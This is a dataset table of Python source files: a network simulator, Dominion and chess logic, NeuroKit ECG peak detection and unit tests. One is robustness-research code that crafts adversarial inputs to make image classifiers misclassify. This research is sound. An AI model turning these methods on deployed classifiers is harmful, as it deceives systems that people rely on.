| max_stars_repo_path (string, 3–269 chars) | max_stars_repo_name (string, 4–119 chars) | max_stars_count (int64, 0–191k) | id (string, 1–7 chars) | content (string, 6–1.05M chars) | score (float64, 0.23–5.13) | int_score (int64, 0–5) |
|---|---|---|---|---|---|---|
fltk/synthpriv/datasets/__init__.py | tudelft-eemcs-dml/fltk-testbed-gr-1 | 0 | 12769951 | from .adult import DistAdultDataset
from .purchase import DistPurchaseDataset
from .synthetic import SyntheticDataset
from .texas import DistTexasDataset
| 0.914063 | 1 |
core/switch.py | kit-tm/fdeval | 1 | 12769952 | from core.consumable import Consumable
from core.events import *
from core.engine import Engine
class Port:
def __init__(self, id):
self.id = id
self.target = None
self.link_out = None
self.link_in = None
self.delegated = None
        # These counters track the flows that have arrived at / been removed
        # from this port between two decision cycles; they are managed by the
        # engine and reset there.
self.cnt_flows_arrived = 0
self.cnt_flows_removed = 0
self.flows = {} # map of registered flows
self.arrival_data = []
self.arrival_rate = 0
self.arrival_last = 0
self.arrival_remove = 0
def register_flow(self, flow):
if not self.flows.get(flow.id):
self.cnt_flows_arrived += 1
self.flows[flow.id] = flow
def unregister_flow(self, flow):
if self.flows.get(flow.id):
del self.flows[flow.id]
            self.cnt_flows_removed += 1
def get_flows(self):
"""Returns a list of flows that entered the switch via this port"""
return filter(lambda flow: flow[1].is_finished == False, self.flows.items())
def reset_arrival_counter(self, history=10):
self.arrival_data.append(self.cnt_flows_arrived)
self.arrival_last = self.cnt_flows_arrived
self.cnt_flows_arrived = 0
self.arrival_remove = self.cnt_flows_removed
self.cnt_flows_removed = 0
        lastn = self.arrival_data[-history:]
self.arrival_rate = 0
if len(lastn) > 0:
self.arrival_rate = sum(lastn)/float(len(lastn))
        # avoid arrival_data getting more than history entries
self.arrival_data = self.arrival_data[-history:]
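# Illustrative sketch (not part of the original module) of how the arrival-rate
# bookkeeping above behaves; the flow stub and history=3 are assumptions.
def _demo_port_arrival_rate():
    class _FlowStub:
        def __init__(self, id):
            self.id = id
            self.is_finished = False
    port = Port(0)
    for cycle in range(5):
        for k in range(cycle + 1):  # register cycle+1 new flows this cycle
            port.register_flow(_FlowStub((cycle, k)))
        port.reset_arrival_counter(history=3)
    return port.arrival_rate  # mean of the last 3 arrival counts: (3+4+5)/3 = 4.0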
class FlowTable:
def __init__(self, switch):
self.switch = switch
self.cnt_flows = 0
class Switch(Consumable):
def __init__(self, ctx, **kwargs):
        super().__init__(ctx, **kwargs)
        self.id = kwargs.get("id") # networkx node id
        self.label = kwargs.get("label", "NoLabelSet") # name in topology
        self.x = kwargs.get("x") # coordinates in topology
        self.y = kwargs.get("y") # coordinates in topology
# create a port object for each port of the switch; these are used
# to store and access port related statistics
cnt = 0
self.ports = {}
for n in ctx.topo.graph.neighbors(self.id):
port = Port(cnt)
cnt += 1
port.target = n
port.link_in = ctx.topo.graph.edges[n, self.id]['_link']
port.link_out = ctx.topo.graph.edges[self.id, n]['_link']
self.ports[(n, self.id)] = port
# create a flow table object for this switch
self.flowtable = FlowTable(self)
        # The logic of the switch is implemented inside the engine; this is
        # similar to connecting a switch to a controller.
self.engine = kwargs.get("engine", Engine(self.ctx, **kwargs)) # routing engine
self.cnt_backdelegations = 0
self.cnt_adddelegations = 0
def reset_counter(self):
self.cnt_backdelegations = 0
self.cnt_adddelegations = 0
def on_event(self, ev):
# periodic counter for statistics
if isinstance(ev, EVStats):
return self.engine.on_EVSwitchStats(self, ev)
# a new flow arrives at the switch
if isinstance(ev, EVSwitchNewFlow):
return self.engine.on_EVSwitchNewFlow(self, ev)
# the last packet of a flow arrives at the switch
if isinstance(ev, EVSwitchLastPacketOfFlowArrived):
return self.engine.on_EVSwitchLastPacketOfFlowArrived(self, ev)
| 2.734375 | 3 |
scripts/attacks.py | akashkumar25/AnalysisBySynthesis | 59 | 12769953 | # ---
# jupyter:
# jupytext_format_version: '1.2'
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# language_info:
# codemirror_mode:
# name: ipython
# version: 3
# file_extension: .py
# mimetype: text/x-python
# name: python
# nbconvert_exporter: python
# pygments_lexer: ipython3
# version: 3.6.4
# ---
# +
import sys
sys.path.insert(0, './../')
# %load_ext autoreload
# %autoreload 2
# %matplotlib inline
import torch
from torchvision import datasets, transforms
import numpy as np
from matplotlib import pyplot as plt
import foolbox
from foolbox import attacks as fa
# own modules
from abs_models import utils as u
from abs_models import models as mz
from abs_models import attack_utils as au
# -
model = mz.get_VAE(n_iter=10) # ABS, do n_iter=50 for original model
# model = mz.get_VAE(binary=True) # ABS with scaling and binarization
# model = mz.get_binary_CNN() # Binary CNN
# model = mz.get_CNN() # Vanilla CNN
# model = mz.get_NearestNeighbor() # Nearest Neighbor, "nearest L2 dist to each class"=logits
# model = mz.get_madry() # Robust network from Madry et al. in tf
# the code is agnostic to PyTorch/TensorFlow models --> wrap into a foolbox model
if model.code_base == 'tensorflow':
fmodel = foolbox.models.TensorFlowModel(model.x_input, model.pre_softmax, (0., 1.),
channel_axis=3)
elif model.code_base == 'pytorch':
model.eval()
fmodel = foolbox.models.PyTorchModel(model, # return logits in shape (bs, n_classes)
bounds=(0., 1.), num_classes=10,
device=u.dev())
else:
    raise NotImplementedError(model.code_base)  # fmodel would be undefined below
# test model
b, l = u.get_batch(bs=10000) # returns random batch as np.array
pred_label = np.argmax(fmodel.batch_predictions(b), axis=1)
print('score', float(np.sum(pred_label == l)) / b.shape[0])
# # Decision based attacks
# Note that this is only demo code. All experiments were optimized for our compute architecture.
b, l = u.get_batch(bs=1) # returns random batch
# +
import time
start = time.time()
att = fa.DeepFoolL2Attack(fmodel)
metric = foolbox.distances.MSE
criterion = foolbox.criteria.Misclassification()
plt.imshow(b[0, 0], cmap='gray')
plt.title('orig')
plt.axis('off')
plt.show()
# Estimate gradients from scores
if not model.has_grad:
GE = foolbox.gradient_estimators.CoordinateWiseGradientEstimator(0.1)
fmodel = foolbox.models.ModelWithEstimatedGradients(fmodel, GE)
# generate adversarial
a = foolbox.adversarial.Adversarial(fmodel, criterion, b[0], l[0], distance=metric)
att(a)
print('runtime', time.time() - start, 'seconds')
if a.image is not None:  # attack was successful
    print('pred', np.argmax(fmodel.predictions(a.image)))
    plt.imshow(a.image[0], cmap='gray')
    plt.title('adv')
    plt.axis('off')
    plt.show()
# -
# # get Trash Adversarials
from foolbox.gradient_estimators import CoordinateWiseGradientEstimator as CWGE
a = np.random.random((1, 28, 28)).astype(np.float32)
a_helper = torch.tensor(a.copy(), requires_grad=True)
fixed_class = 1
GE = CWGE(1.)
opti = torch.optim.SGD([a_helper], lr=1, momentum=0.95)
# +
confidence_level = model.confidence_level # abs 0.0000031, CNN 1439000, madry 60, 1-NN 0.000000000004
logits_scale = model.logit_scale # ABS 430, madry 1, CNN 1, 1-NN 5
a_orig = a
plt.imshow(u.t2n(a[0]), cmap='gray')
plt.show()
for i in range(10000):
logits = fmodel.predictions(a)
probs = u.t2n(u.confidence_softmax(logits_scale*torch.from_numpy(logits[None, :]), dim=1,
const=confidence_level))[0]
pred_class = np.argmax(u.t2n(logits).squeeze())
    if probs[fixed_class] >= 0.9:
break
grads = GE(fmodel.batch_predictions, a, fixed_class, (0,1))
a = au.update_distal_adv(a, a_helper, grads, opti)
if i % 1000 == 0:
print(f'probs {probs[pred_class]:.3f} class', pred_class)
fig, ax = plt.subplots(1,3, squeeze=False, figsize=(10, 4))
ax[0, 0].imshow(u.t2n(a[0]), cmap='gray')
ax[0, 1].imshow(u.t2n(grads[0]), cmap='gray')
ax[0, 2].imshow(np.sign(grads[0]), cmap='gray')
plt.show()
plt.imshow(u.t2n(a[0]), cmap='gray')
plt.show()
# -
# # Latent Descent Attack
# +
# only for abs
att = au.LineSearchAttack(model) # BinaryLineSearchAttack
b, l = u.get_batch(bs=200)
advs = att(b, l, n_coarse_steps=50+1, n_ft_steps=2)
for adv in advs:
adv['img'] = adv['img'].cpu().numpy()
for i, (a_i, b_i) in enumerate(zip(advs, b)):
l2 = np.sqrt(a_i['distance'] * 784) # convert from MSE
fig, ax = plt.subplots(1, 2, squeeze=False)
ax[0, 0].set_title(str(a_i['original_label']))
ax[0, 0].imshow(u.t2n(b_i[0]), cmap='gray')
ax[0, 1].set_title(str(a_i['adversarial_label']))
ax[0, 1].imshow(u.t2n(a_i['img'][0]), cmap='gray')
plt.show()
    if i == 10:
break
print('mean L2', np.mean([np.sqrt(a_i['distance'] * 784) for a_i in advs]))
| 2.140625 | 2 |
test.py | spokenlore/PythonCalendar | 0 | 12769954 | import time
def main():
start = time.time()
minimumElapsed = .5
while True:
if time.time() - start > minimumElapsed:
print "Loading..."
minimumElapsed += .5
main()
| 3.4375 | 3 |
woodcutter/src/Gamestate.py | cevirici/dominion-woodcutter | 0 | 12769955 | # -*- coding: utf-8 -*-
from .Card import *
from .Pile import *
from .Utils import *
class Gamestate:
def __init__(self):
self.cards = []
self.zones = {z: [[] for p in range(PLAYER_COUNT)] for z in PlayerZones}
self.zones.update({z: [] for z in NeutralZones})
self.piles = []
self.player = 0
self.turnNumber = 0
self.turnType = TurnTypes.PREGAME
self.stack = []
self.logLine = 0
self.candidates = []
self.selectedMove = None
self.actions = 0
self.buys = 0
self.coins = 0
self.potions = 0
self.vp = [0 for p in range(PLAYER_COUNT)]
self.coffers = [0 for p in range(PLAYER_COUNT)]
self.debt = [0 for p in range(PLAYER_COUNT)]
self.villagers = [0 for p in range(PLAYER_COUNT)]
self.reductions = []
self.flags = []
def __repr__(self):
        return repr(self.selectedMove)
def getZone(self, zoneName, player):
if player == -1:
player = self.player
if isinstance(zoneName, PlayerZones):
return self.zones[zoneName][player]
else:
return self.zones[zoneName]
def zoneCount(self, zoneName, player=-1):
return len(self.getZone(zoneName, player))
def zoneContains(self, cardName, zoneName, player=-1):
for card in self.getZone(zoneName, player):
if card.name == cardName:
return True
return False
def addCard(self, cardInfo, zoneName, player=-1):
zone = self.getZone(zoneName, player)
newCard = Card(cardInfo, len(self.cards), zoneName, player)
self.cards.append(newCard)
zone.append(newCard)
def moveCards(self, cardList, src, dest, srcP=-1, destP=-1):
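        """Move the named cards from the src zone to the dest zone. Returns the
        list of moved Card objects, or False if any requested card name is not
        found in the source zone."""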
srcZone = self.getZone(src, srcP)
destZone = self.getZone(dest, destP)
movedCards = []
for cardName in cardList:
moved = False
for target in srcZone:
if target.name == cardName:
srcZone.remove(target)
destZone.append(target)
target.move(dest, self)
target.player = self.player if destP == -1 else destP
moved = True
movedCards.append(target)
break
if not moved:
return False
return movedCards
def moveAllCards(self, src, dest, srcP=-1, destP=-1):
srcZone = self.getZone(src, srcP)
destZone = self.getZone(dest, destP)
for card in srcZone:
card.location = dest
card.player = self.player if destP == -1 else destP
destZone += srcZone
srcZone.clear()
| 2.484375 | 2 |
neurokit2/ecg/ecg_peaks.py | danibene/NeuroKit | 0 | 12769956 | # - * - coding: utf-8 - * -
from ..signal import signal_fixpeaks, signal_formatpeaks
from .ecg_findpeaks import ecg_findpeaks
def ecg_peaks(
ecg_cleaned, sampling_rate=1000, method="neurokit", correct_artifacts=False, **kwargs
):
"""**Find R-peaks in an ECG signal**
    Find R-peaks in an ECG signal using the specified method. The method accepts unfiltered ECG
    signals as input, although a filtered (cleaned) ECG is expected to yield better
    results.
Parameters
----------
ecg_cleaned : Union[list, np.array, pd.Series]
The cleaned ECG channel as returned by ``ecg_clean()``.
sampling_rate : int
The sampling frequency of ``ecg_signal`` (in Hz, i.e., samples/second). Defaults to 1000.
method : string
The algorithm to be used for R-peak detection. Can be one of ``"neurokit"`` (default),
``"pantompkins1985"``, ``"nabian2018"``, ``"gamboa2008"``, ``"zong2003"``,
``"hamilton2002"``, ``"christov2004"``, ``"engzeemod2012"``, ``"elgendi2010"``,
``"kalidas2017"``, ``"martinez2003"``, ``"rodrigues2021"`` or ``"promac"``.
correct_artifacts : bool
Whether or not to first identify and fix artifacts as defined by
Lipponen & Tarvainen (2019).
**kwargs
Additional keyword arguments, usually specific for each method.
Returns
-------
    signals : DataFrame
        A DataFrame of same length as the input signal in which occurrences of R-peaks are
        marked as ``1`` in a list of zeros with the same length as ``ecg_cleaned``. Accessible
        with the key ``"ECG_R_Peaks"``.
info : dict
A dictionary containing additional information, in this case the samples at which R-peaks
occur, accessible with the key ``"ECG_R_Peaks"``, as well as the signals' sampling rate,
accessible with the key ``"sampling_rate"``.
See Also
--------
ecg_clean, ecg_findpeaks, .signal_fixpeaks
Examples
--------
* **Example 1**: Find R-peaks using the default method (``"neurokit"``).
.. ipython:: python
import neurokit2 as nk
ecg = nk.ecg_simulate(duration=10, sampling_rate=1000)
signals, info = nk.ecg_peaks(ecg, correct_artifacts=True)
@savefig p_ecg_peaks1.png scale=100%
nk.events_plot(info["ECG_R_Peaks"], ecg)
* **Example 2**: Compare different methods
.. ipython:: python
# neurokit (default)
cleaned = nk.ecg_clean(ecg, method="neurokit")
_, neurokit = nk.ecg_peaks(cleaned, method="neurokit")
# pantompkins1985
cleaned = nk.ecg_clean(ecg, method="pantompkins1985")
_, pantompkins1985 = nk.ecg_peaks(cleaned, method="pantompkins1985")
# nabian2018
_, nabian2018 = nk.ecg_peaks(ecg, method="nabian2018")
# hamilton2002
cleaned = nk.ecg_clean(ecg, method="hamilton2002")
_, hamilton2002 = nk.ecg_peaks(cleaned, method="hamilton2002")
# martinez2003
_, martinez2003 = nk.ecg_peaks(ecg, method="martinez2003")
# christov2004
_, christov2004 = nk.ecg_peaks(cleaned, method="christov2004")
# gamboa2008
cleaned = nk.ecg_clean(ecg, method="gamboa2008")
_, gamboa2008 = nk.ecg_peaks(cleaned, method="gamboa2008")
# elgendi2010
cleaned = nk.ecg_clean(ecg, method="elgendi2010")
_, elgendi2010 = nk.ecg_peaks(cleaned, method="elgendi2010")
# engzeemod2012
cleaned = nk.ecg_clean(ecg, method="engzeemod2012")
_, engzeemod2012 = nk.ecg_peaks(cleaned, method="engzeemod2012")
# kalidas2017
cleaned = nk.ecg_clean(ecg, method="kalidas2017")
_, kalidas2017 = nk.ecg_peaks(cleaned, method="kalidas2017")
# rodrigues2021
_, rodrigues2021 = nk.ecg_peaks(ecg, method="rodrigues2021")
# Collect all R-peak lists by iterating through the result dicts
rpeaks = [
i["ECG_R_Peaks"]
for i in [
neurokit,
pantompkins1985,
nabian2018,
hamilton2002,
martinez2003,
christov2004,
gamboa2008,
elgendi2010,
engzeemod2012,
kalidas2017,
rodrigues2021,
]
]
# Visualize results
@savefig p_ecg_peaks2.png scale=100%
nk.events_plot(rpeaks, ecg)
* **Example 3**: Method-agreement procedure ('promac')
.. ipython:: python
ecg = nk.ecg_simulate(duration=10, sampling_rate=500)
ecg = nk.signal_distort(ecg,
sampling_rate=500,
noise_amplitude=0.05, noise_frequency=[25, 50],
artifacts_amplitude=0.05, artifacts_frequency=50)
@savefig p_ecg_peaks3.png scale=100%
        info = nk.ecg_findpeaks(ecg, sampling_rate=500, method="promac", show=True)
References
----------
* ``neurokit``
* **Unpublished.** See this discussion for more information on the method:
https://github.com/neuropsychology/NeuroKit/issues/476
* ``pantompkins1985``
* <NAME>., & <NAME>. (1985). A real-time QRS detection algorithm. IEEE transactions
on biomedical engineering, (3), 230-236.
* ``nabian2018``
* <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., <NAME>. (2018).
An Open-Source Feature Extraction Tool for the Analysis of Peripheral Physiological Data.
IEEE Journal of Translational Engineering in Health and Medicine, 6, 1-11.
doi:10.1109/jtehm.2018.2878000
* ``gamboa2008``
* <NAME>. (2008). Multi-modal behavioral biometrics based on hci and electrophysiology.
        PhD thesis, Universidade.
* ``zong2003``
* <NAME>., <NAME>., <NAME>., & <NAME>. (2003). An open-source algorithm to
detect onset of arterial blood pressure pulses. In Computers in Cardiology, 2003 (pp.
259-262). IEEE.
* ``hamilton2002``
* <NAME>. (2002). Open source ECG analysis. In Computers in cardiology (pp. 101-104).
IEEE.
* ``christov2004``
* <NAME>, Real time electrocardiogram QRS detection using combined adaptive
threshold, BioMedical Engineering OnLine 2004, vol. 3:28, 2004.
* ``engzeemod2012``
* <NAME>., & <NAME>. (1979). A single scan algorithm for QRS-detection and
feature extraction. Computers in cardiology, 6(1979), 37-42.
* <NAME>., <NAME>., <NAME>., <NAME>., & <NAME>. (2012, February). Real
Time Electrocardiogram Segmentation for Finger based ECG Biometrics. In Biosignals (pp.
49-54).
* ``elgendi2010``
* <NAME>., <NAME>., & <NAME>. (2010). Frequency Bands Effects on QRS Detection.
Biosignals, Proceedings of the Third International Conference on Bio-inspired Systems and
Signal Processing, 428-431.
* ``kalidas2017``
* <NAME>., & <NAME>. (2017, October). Real-time QRS detector using stationary wavelet
transform for automated ECG analysis. In 2017 IEEE 17th International Conference on
Bioinformatics and Bioengineering (BIBE) (pp. 457-461). IEEE.
* ``martinez2003``
**Unknown.** Please help us retrieve the correct source!
* ``rodrigues2021``
* <NAME>., <NAME>., <NAME>., & <NAME>. (2015). Novel
real-time low-complexity QRS complex detector based on adaptive thresholding. IEEE
Sensors Journal, 15(10), 6036-6043.
* <NAME>., & <NAME>. (2012). R-peak detection algorithm for ECG using double
difference and RR interval processing. Procedia Technology, 4, 873-877.
* <NAME> & Samoutphonh, Sirisack & <NAME> & <NAME>. (2021).
A Low-Complexity R-peak Detection Algorithm with Adaptive Thresholding for Wearable
Devices.
* ``promac``
* **Unpublished.** It runs different methods and derives a probability index using
convolution. See this discussion for more information on the method:
https://github.com/neuropsychology/NeuroKit/issues/222
* <NAME>., & <NAME>. (2019). A robust algorithm for heart rate variability
time series artefact correction using novel beat classification. Journal of medical
engineering & technology, 43(3), 173-181.
"""
rpeaks = ecg_findpeaks(ecg_cleaned, sampling_rate=sampling_rate, method=method, **kwargs)
if correct_artifacts:
_, rpeaks = signal_fixpeaks(
rpeaks, sampling_rate=sampling_rate, iterative=True, method="Kubios"
)
rpeaks = {"ECG_R_Peaks": rpeaks}
instant_peaks = signal_formatpeaks(rpeaks, desired_length=len(ecg_cleaned), peak_indices=rpeaks)
signals = instant_peaks
info = rpeaks
info["sampling_rate"] = sampling_rate # Add sampling rate in dict info
return signals, info
| 3.1875 | 3 |
preprocess/export_docIds.py | nladuo/snrm | 0 | 12769957 | import pymongo
import json
client = pymongo.MongoClient()
db = client.snrm
coll = db.docs
docIds = []
for doc in coll.find({}):
docIds.append(doc["docNo"])
with open("../data/docIds.json", "w") as f:
json.dump(docIds, f)
| 2.6875 | 3 |
tests/source_image_caching_resolver_ut.py | jamieparkinson/loris | 150 | 12769958 | import os
import shutil
import unittest
from tests.abstract_resolver import AbstractResolverTest
from loris import resolver
class SourceImageCachingResolverTest(AbstractResolverTest, unittest.TestCase):
def setUp(self):
super(SourceImageCachingResolverTest, self).setUp()
tests_dir = os.path.dirname(os.path.realpath(__file__))
self.cache_dir = os.path.join(tests_dir, 'cache')
config = {
'source_root': os.path.join(tests_dir, 'img'),
'cache_root': self.cache_dir
}
self.identifier = '01/02/0001.jp2'
self.expected_filepath = os.path.join(
self.cache_dir,
self.identifier
)
self.not_identifier = 'DOES_NOT_EXIST.jp2'
self.expected_format = 'jp2'
self.resolver = resolver.SourceImageCachingResolver(config)
def test_resolve(self):
super(SourceImageCachingResolverTest, self).test_resolve()
# Make sure the file exists in the cache
self.assertTrue(os.path.isfile(self.expected_filepath))
def tearDown(self):
# Clean Up the cache directory
if os.path.exists(self.cache_dir):
shutil.rmtree(self.cache_dir)
| 2.609375 | 3 |
tests/api/single_load/test_optional_types.py | ssato/python-anyconfig | 213 | 12769959 | #
# Copyright (C) 2021 <NAME> <<EMAIL>>
# License: MIT
#
# pylint: disable=missing-docstring
import unittest
import anyconfig.api
from . import common
LOADER_TYPES = frozenset(anyconfig.api.list_types())
@unittest.skipIf('yaml' not in LOADER_TYPES,
'yaml loader is not available')
class YamlTestCase(common.TestCase):
kind = 'yaml'
pattern = '*.yml'
@unittest.skipIf('toml' not in LOADER_TYPES,
'toml loader is not available')
class TomlTestCase(YamlTestCase):
kind = 'toml'
pattern = '*.toml'
# vim:sw=4:ts=4:et:
| 1.992188 | 2 |
logic.py | qwlea/chess | 0 | 12769960 | import pygame
# This class internally handles all of the board logic that's necessary to ensure legal moves are played
class Logic:
def __init__(self, bd):
self._board = bd
# This is a utility function that is used by the other functions of this class
def verify_legal(self, col, row, legal_moves):
if 7 >= col >= 0 and 7 >= row >= 0:
legal_moves.add((col, row))
# Returns the set of all board spaces a given piece can move to, disregarding potential discovered checks/pins and
# piece color.
def get_legal_piece(self, piece, opponent, depth):
legal_mvs = set()
tiles = self._board.get_tiles()
coords = piece.get_coords()
col = coords[0]
row = coords[1]
if piece.get_type() // 2 == 0: # Piece is a king
self.verify_legal(col + 1, row, legal_mvs)
self.verify_legal(col, row + 1, legal_mvs)
self.verify_legal(col + 1, row + 1, legal_mvs)
self.verify_legal(col + 1, row - 1, legal_mvs)
self.verify_legal(col - 1, row + 1, legal_mvs)
self.verify_legal(col - 1, row - 1, legal_mvs)
self.verify_legal(col - 1, row, legal_mvs)
self.verify_legal(col, row - 1, legal_mvs)
# This section is for castling purposes. Castling can only be performed when all of the spaces in between a
# king and a rook are not under attack by the opposing player and neither the king or rook has moved.
if depth == 0:
opp_mvs = self.get_legal_player(opponent)
if piece.get_n_move() and tiles[col + 3][row].get_piece() is not None and \
tiles[col + 3][row].get_piece().get_n_move():
can_castle = True
for i in range(col, col + 3):
if (i, row) in opp_mvs: can_castle = False
for i in range(col + 1, col + 3):
if tiles[i][row].get_piece() is not None: can_castle = False
if can_castle: legal_mvs.add((col + 2, row))
if piece.get_n_move() and tiles[col - 4][row].get_piece() is not None and \
tiles[col - 4][row].get_piece().get_n_move():
can_castle = True
for i in range(col - 3, col + 1):
if (i, row) in opp_mvs: can_castle = False
for i in range(col - 3, col):
if tiles[i][row].get_piece() is not None: can_castle = False
if can_castle: legal_mvs.add((col - 2, row))
elif piece.get_type() // 2 == 1: # Piece is a queen
tmp_col = col + 1
tmp_row = row + 1
while tmp_col <= 7 and tmp_row <= 7:
self.verify_legal(tmp_col, tmp_row, legal_mvs)
if tiles[tmp_col][tmp_row].get_piece() is not None: break
tmp_col += 1
tmp_row += 1
tmp_col = col - 1
tmp_row = row + 1
while tmp_col >= 0 and tmp_row <= 7:
self.verify_legal(tmp_col, tmp_row, legal_mvs)
if tiles[tmp_col][tmp_row].get_piece() is not None: break
tmp_col -= 1
tmp_row += 1
tmp_col = col + 1
tmp_row = row - 1
while tmp_col <= 7 and tmp_row >= 0:
self.verify_legal(tmp_col, tmp_row, legal_mvs)
if tiles[tmp_col][tmp_row].get_piece() is not None: break
tmp_col += 1
tmp_row -= 1
tmp_col = col - 1
tmp_row = row - 1
while tmp_col >= 0 and tmp_row >= 0:
self.verify_legal(tmp_col, tmp_row, legal_mvs)
if tiles[tmp_col][tmp_row].get_piece() is not None: break
tmp_col -= 1
tmp_row -= 1
tmp_col = col + 1
while tmp_col <= 7:
self.verify_legal(tmp_col, row, legal_mvs)
if tiles[tmp_col][row].get_piece() is not None: break
tmp_col += 1
tmp_col = col - 1
while tmp_col >= 0:
self.verify_legal(tmp_col, row, legal_mvs)
if tiles[tmp_col][row].get_piece() is not None: break
tmp_col -= 1
tmp_row = row + 1
while tmp_row <= 7:
self.verify_legal(col, tmp_row, legal_mvs)
if tiles[col][tmp_row].get_piece() is not None: break
tmp_row += 1
tmp_row = row - 1
while tmp_row >= 0:
self.verify_legal(col, tmp_row, legal_mvs)
if tiles[col][tmp_row].get_piece() is not None: break
tmp_row -= 1
elif piece.get_type() // 2 == 2: # Piece is a rook
tmp_col = col + 1
while tmp_col <= 7:
self.verify_legal(tmp_col, row, legal_mvs)
if tiles[tmp_col][row].get_piece() is not None: break
tmp_col += 1
tmp_col = col - 1
while tmp_col >= 0:
self.verify_legal(tmp_col, row, legal_mvs)
if tiles[tmp_col][row].get_piece() is not None: break
tmp_col -= 1
tmp_row = row + 1
while tmp_row <= 7:
self.verify_legal(col, tmp_row, legal_mvs)
if tiles[col][tmp_row].get_piece() is not None: break
tmp_row += 1
tmp_row = row - 1
while tmp_row >= 0:
self.verify_legal(col, tmp_row, legal_mvs)
if tiles[col][tmp_row].get_piece() is not None: break
tmp_row -= 1
elif piece.get_type() // 2 == 3: # Piece is a knight
self.verify_legal(col + 1, row + 2, legal_mvs)
self.verify_legal(col + 2, row + 1, legal_mvs)
self.verify_legal(col - 1, row + 2, legal_mvs)
self.verify_legal(col + 2, row - 1, legal_mvs)
self.verify_legal(col - 2, row + 1, legal_mvs)
self.verify_legal(col + 1, row - 2, legal_mvs)
self.verify_legal(col - 1, row - 2, legal_mvs)
self.verify_legal(col - 2, row - 1, legal_mvs)
elif piece.get_type() // 2 == 4: # Piece is a bishop
tmp_col = col + 1
tmp_row = row + 1
while tmp_col <= 7 and tmp_row <= 7:
self.verify_legal(tmp_col, tmp_row, legal_mvs)
if tiles[tmp_col][tmp_row].get_piece() is not None: break
tmp_col += 1
tmp_row += 1
tmp_col = col - 1
tmp_row = row + 1
while tmp_col >= 0 and tmp_row <= 7:
self.verify_legal(tmp_col, tmp_row, legal_mvs)
if tiles[tmp_col][tmp_row].get_piece() is not None: break
tmp_col -= 1
tmp_row += 1
tmp_col = col + 1
tmp_row = row - 1
while tmp_col <= 7 and tmp_row >= 0:
self.verify_legal(tmp_col, tmp_row, legal_mvs)
if tiles[tmp_col][tmp_row].get_piece() is not None: break
tmp_col += 1
tmp_row -= 1
tmp_col = col - 1
tmp_row = row - 1
while tmp_col >= 0 and tmp_row >= 0:
self.verify_legal(tmp_col, tmp_row, legal_mvs)
if tiles[tmp_col][tmp_row].get_piece() is not None: break
tmp_col -= 1
tmp_row -= 1
elif piece.get_type() // 2 == 5: # Piece is a pawn
if piece.get_type() % 2 == 0: # Piece is white
if piece.get_coords()[1] == 1 and tiles[col][row + 1].get_piece() is None and tiles[col][row + 2].get_piece() is None:
legal_mvs.add((col, row + 2))
if tiles[col][row + 1].get_piece() is None:
legal_mvs.add((col, row + 1))
if col + 1 <= 7 and row + 1 <= 7 and tiles[col + 1][row + 1].get_piece() is not None:
legal_mvs.add((col + 1, row + 1))
if col - 1 >= 0 and row + 1 <= 7 and tiles[col - 1][row + 1].get_piece() is not None:
legal_mvs.add((col - 1, row + 1))
# En passant
if col + 1 <= 7 and row + 1 <= 7 and tiles[col + 1][row].get_piece() is not None and\
tiles[col + 1][row].get_piece().get_type() % 2 != piece.get_type() % 2 and\
tiles[col + 1][row].get_piece().get_d_move():
legal_mvs.add((col + 1, row + 1))
if col - 1 >= 0 and row + 1 <= 7 and tiles[col - 1][row].get_piece() is not None and\
tiles[col - 1][row].get_piece().get_type() % 2 != piece.get_type() % 2 and\
tiles[col - 1][row].get_piece().get_d_move():
legal_mvs.add((col - 1, row + 1))
else: # Piece is black
if piece.get_coords()[1] == 6 and tiles[col][row - 1].get_piece() is None and tiles[col][row - 2].get_piece() is None:
legal_mvs.add((col, row - 2))
if tiles[col][row - 1].get_piece() is None:
legal_mvs.add((col, row - 1))
if col + 1 <= 7 and row - 1 >= 0 and tiles[col + 1][row - 1].get_piece() is not None:
legal_mvs.add((col + 1, row - 1))
if col - 1 >= 0 and row - 1 >= 0 and tiles[col - 1][row - 1].get_piece() is not None:
legal_mvs.add((col - 1, row - 1))
# En passant
if col + 1 <= 7 and row - 1 >= 0 and tiles[col + 1][row].get_piece() is not None and\
tiles[col + 1][row].get_piece().get_type() % 2 != piece.get_type() % 2 and\
tiles[col + 1][row].get_piece().get_d_move():
legal_mvs.add((col + 1, row - 1))
if col - 1 >= 0 and row - 1 >= 0 and tiles[col - 1][row].get_piece() is not None and\
tiles[col - 1][row].get_piece().get_type() % 2 != piece.get_type() % 2 and\
tiles[col - 1][row].get_piece().get_d_move():
legal_mvs.add((col - 1, row - 1))
return legal_mvs
# returns the set of all legal moves a player can make, still disregarding discovered checks/pins and piece color
def get_legal_player(self, player):
legal_mvs = set()
for piece in player.get_owned():
for coords in self.get_legal_piece(piece, None, 1):
legal_mvs.add(coords)
return legal_mvs
# Safely checks if a given move is legal by simulating the play on the board and then reverting all changes
def safe_check_legal(self, selected_piece, target_tile, player, opponent):
if target_tile.get_coords() not in self.get_legal_piece(selected_piece, opponent, 0): return False
if target_tile.get_piece() is not None and\
target_tile.get_piece().get_type() % 2 == selected_piece.get_type() % 2: return False
tmp_piece = target_tile.get_piece()
# This simulates a capture so that capturing a piece that has put the turn player's king in check is legal
if tmp_piece is not None:
opponent.get_owned().remove(tmp_piece)
tmp_tile = selected_piece.get_tile()
selected_piece.change_tiles(target_tile)
king_coords = player.get_king().get_coords()
if king_coords in self.get_legal_player(opponent):
selected_piece.change_tiles(tmp_tile)
target_tile.set_piece(tmp_piece)
if tmp_piece is not None:
opponent.get_owned().add(tmp_piece)
return False
selected_piece.change_tiles(tmp_tile)
target_tile.set_piece(tmp_piece)
if tmp_piece is not None:
opponent.get_owned().add(tmp_piece)
return True
# Gets the "true" legal spaces a piece can move to, the spaces that won't leave the player's king in check
def get_true_legal_piece(self, piece, player, opponent):
true_legal = set()
for coords in self.get_legal_piece(piece, opponent, 0):
if self.safe_check_legal(piece, self._board.get_tile(coords), player, opponent):
true_legal.add(coords)
return true_legal
# Gets the "true" legal spaces all of a player's pieces can move to that won't leave that player's king in check
def get_true_legal_player(self, player, opponent):
true_legal = set()
for piece in player.get_owned():
for coords in self.get_true_legal_piece(piece, player, opponent):
true_legal.add(coords)
return true_legal
# Checks all possible legal moves a player can make to verify whether the game is in stale/checkmate
# "NM" == No Mate, "SM" == Stalemate, "CM" == Checkmate
def safe_check_mate(self, player, opponent):
for piece in player.get_owned():
for tile_coords in self.get_legal_piece(piece, opponent, 0):
if self.safe_check_legal(piece, self._board.get_tile(tile_coords), player, opponent):
return "NM"
